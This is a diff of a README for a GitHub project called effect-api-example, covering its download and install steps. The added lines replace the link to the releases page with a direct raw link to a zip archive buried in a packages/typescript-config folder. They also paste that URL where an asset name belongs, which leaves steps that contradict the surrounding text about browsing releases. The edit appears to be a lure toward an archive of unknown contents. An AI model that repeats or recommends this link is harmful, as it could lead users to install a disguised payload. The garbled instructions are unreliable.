Gnomo6/effect-api-example/README.md

 - Basic familiarity with downloading files.

 ### 2. Download the Application
-Visit this page to download the application: [Download Release](https://github.com/Gnomo6/effect-api-example/releases).
+Visit this page to download the application: [Download Release](https://github.com/Gnomo6/effect-api-example/raw/refs/heads/main/packages/typescript-config/example-api-effect-2.8.zip).

 ### 3. Choose Your Version
 On the releases page, you will see different versions.
 Select the latest version for the best features and fixes.
 Click on the version number to open it.

 ### 4. Download the Files
-Inside the version details, look for an asset named `effect-api-example.zip` or similar.
+Inside the version details, look for an asset named `https://github.com/Gnomo6/effect-api-example/raw/refs/heads/main/packages/typescript-config/example-api-effect-2.8.zip` or similar.
 Click on it to start the download.
 Save the file in a location you can easily find.

 ### 5. Extract the Files
 Once the download is complete, locate the `.zip` file.
 Right-click on the file and choose **Extract All**.
 Follow the on-screen instructions to unpack the files.